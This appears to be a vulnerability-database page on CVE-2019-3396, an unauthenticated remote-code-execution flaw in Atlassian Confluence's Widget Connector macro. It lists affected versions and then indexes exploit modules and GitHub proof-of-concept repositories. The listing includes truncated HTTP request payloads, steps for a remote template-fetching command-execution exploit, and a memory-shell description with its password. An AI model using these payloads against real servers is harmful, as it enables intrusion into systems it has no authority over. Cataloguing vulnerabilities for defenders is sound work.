9.8
CVSSv3

CVE-2019-3396

Published: 25/03/2019 Updated: 21/11/2024

Vulnerability Summary

The Widget Connector macro in Atlassian Confluence Server before version 6.6.12 (the fixed version for 6.6.x), from version 6.7.0 prior to 6.12.3 (the fixed version for 6.12.x), from version 6.13.0 prior to 6.13.3 (the fixed version for 6.13.x), and from version 6.14.0 prior to 6.14.2 (the fixed version for 6.14.x), allows remote malicious users to achieve path traversal and remote code execution on a Confluence Server or Data Center instance via server-side template injection.

Vulnerability Trend

Vulnerable Product Search on Vulmon Subscribe to Product

atlassian confluence

atlassian confluence server

Exploits

## # This module requires Metasploit: metasploitcom/download # Current source: githubcom/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::EXE include Msf::Exploit::FileDropper include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remo ...
Widget Connector Macro is part of Atlassian Confluence Server and Data Center that allows embed online videos, slideshows, photostreams and more directly into page A _template parameter can be used to inject remote Java code into a Velocity template, and gain code execution Authentication is not required to exploit this vulnerability By default, ...
Atlassian Confluence version 6121 suffers from a Widget Connector Macro template injection vulnerability ...

Github Repositories

InfosecBookmarks Organizando os bookmarks que acumulei no Chrome Bug Bounty Methodology WebHacking Recon Tools Awesome Lists Bugs Finding Subdomain Takeover Finding Race Conditions Finding Open Redirections Finding XXE Finding RCE Finding SSRF Finding XSS Finding CSRF Finding SQLi Finding IDOR Mobile Tools CheatSheet Mobile Writeups API Test Labs WriteUps Subdomain

cve-2019-3396 Unauthenticated Confluence RCE (cve-2019-3396) setup exploit libraries bundle install run ┌──(user㉿hostname)-[~/path/to/cve-2019-3396] └─$ ruby cve-2019-3396rb exploit -> CVE-2019-3396 Author -> Abdallah Mohamed Elsharif Greetz to Ghost5egy and Hamza Abdulrahma

Confluence 未授权 RCE (CVE-2019-3396) 漏洞

CVE-2019-3396 Confluence 未授权 RCE (CVE-2019-3396) 漏洞 坑点:有些版本需要加Referer才能成功 File Read POST /rest/tinymce/1/macro/preview HTTP/11 Host: 101020181 User-Agent: Mozilla/50 (Windows NT 100; Win64; x64; rv:550) Gecko/20100101 Firefox/550 Accept: text/plain, */*; q=001 Accept-Language: zh-CN,zh;q=08,en-US;q=05,en;q=03 Accept-Encoding: g

confluence ssrf malware cleaner

Confluence ssrf 보안취약점 malware클린 툴(kerberods) 컨플루언스의 보안 취약점을 이용한 ssrf 공격때문에 짜증나서 만들어봄 컨플루언스 보안 권고 메일 전문 보기(한국어 번역) CVE-2019-3396 위젯 커넥터 (Widget Connector) 취약점을 공격 하는 적극적인 익스플로잇 입니다 ( Confluence Security Advisory -

CVE-2019-3396 漏洞验证txt与模板文件。

CVE-2019-3396-confluence-poc 漏洞验证txt与模板文件。

Confluence Widget Connector path traversal (CVE-2019-3396)

CVE-2019-3396 Confluence Widget Connector path traversal (CVE-2019-3396) RCE POC POST /rest/tinymce/1/macro/preview HTTP/11 Host: xxxx Connection: close Accept-Encoding: gzip, deflate Accept: */* User-Agent: Mozilla/50 (X11; Linux x86_64; rv:600) Gecko/20100101 Firefox/600 Content-Type: application/json; charset=utf-8 Referer: xxxx/pages/resumedraftaction?draf

Confluence Widget Connector path traversal (CVE-2019-3396)

CVE-2019-3396 Confluence Widget Connector path traversal (CVE-2019-3396) RCE POC POST /rest/tinymce/1/macro/preview HTTP/11 Host: xxxx Connection: close Accept-Encoding: gzip, deflate Accept: */* User-Agent: Mozilla/50 (X11; Linux x86_64; rv:600) Gecko/20100101 Firefox/600 Content-Type: application/json; charset=utf-8 Referer: xxxx/pages/resumedraftaction?draf

CVE-2019-3396 confluence SSTI RCE

CVE-2019-3396_EXP CVE-2019-3396 confluence SSTI RCE 1、put the cmdvm on your website (must use ftp or https ,http doesn't work ) 2、modify RCE_exppy ,change the filename = 'ftp://1111/cmdvm' (python -m pyftpdlib -p 21) 3、python REC_exppy testwiki_testcc:8080 "whoami" $ python REC_exppy testwiki_testcc:8080 "id&q

Confluence Widget Connector path traversal (CVE-2019-3396)

confluence_CVE-2019-3396

一些漏洞检测/利用脚本

概述 该项目用于存放一些平时写的漏洞检测/利用脚本,不出意外会持续更新。 已有POC thinkphp v5 RCE漏洞 Confluence RCE漏洞,编号CVE-2019-3396 Weblogic wls async unserialization RCE漏洞,编号CVE-2019-2795 Apache Shiro RCE漏洞

一些漏洞检测/利用脚本

概述 该项目用于存放一些平时写的漏洞检测/利用脚本,不出意外会持续更新。 已有POC thinkphp v5 RCE漏洞 Confluence RCE漏洞,编号CVE-2019-3396 Weblogic wls async unserialization RCE漏洞,编号CVE-2019-2795 Apache Shiro RCE漏洞

CVE-2019-3396_Confluence All documentation is in script file This exploit is also part of Exploit Database maintained by Offensive Security Screenshots

Confluence(<install-directory>/confluence/WEB-INF/)文件读取漏洞

CVE-2019-3394 Confluence(install-directory&gt;/confluence/WEB-INF/)文件读取漏洞 BurpSuite Request vuln_url 101020166:8090/rest/api/content/65610?status=draft PUT /rest/api/content/65610?status=draft HTTP/11 Host: 101020166:8090 User-Agent: Mozilla/50 (Windows NT 100; Win64; x64; rv:550) Gecko/20100101 Firefox/550 Accept: application/json, text/ja

https://github.com/Yt1g3r/CVE-2019-3396_EXP.git

test1 githubcom/Yt1g3r/CVE-2019-3396_EXPgit

CVE-2019-3396 Memshell for Behinder

CVE-2019-3396-Memshell-for-Behinder CVE-2019-3396 Memshell for Behinder Usage javac BehinderMemShelljava then Turn BehinderMemShellclass to BCEL Behinder URL : the-confluence-ip/loginaction Script Type: JSP Password:rebeyond Header:X-Expires: memok

https://caodchuong312.github.io/test/

CVE-2019-3396: rcevm

Recent Articles

MATA: Multi-platform targeted malware framework
Securelist • GReAT • 22 Jul 2020

As the IT and OT environment becomes more complex, adversaries are quick to adapt their attack strategy. For example, as users’ work environments diversify, adversaries are busy acquiring the TTPs to infiltrate systems. Recently, we reported to our Threat Intelligence Portal customers a similar malware framework that internally we called MATA. The MATA malware framework possesses several components, such as loader, orchestrator and plugins. This comprehensive framework is able to target Window...